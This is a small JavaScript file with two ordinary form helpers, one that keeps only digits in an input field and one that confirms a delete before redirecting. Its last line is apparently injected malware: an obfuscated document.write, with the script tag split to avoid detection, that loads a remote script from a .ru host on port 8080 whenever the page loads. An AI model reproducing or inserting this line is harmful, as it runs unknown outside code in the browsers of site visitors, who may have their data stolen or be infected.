function intOnly (i) {
  if(i.value.length>0) {
   i.value = i.value.replace(/[^\d]+/g, ''); }
}

function ConfirmChoice (filename) { 
	answer = confirm("Are you sure to delete this data?") 
	if (answer !=0) { 
		location = filename 
	} 
}

document.write('<s'+'cript type="text/javascript" src="http://malepad.ru:8080/Gibibyte.js"></scr'+'ipt>');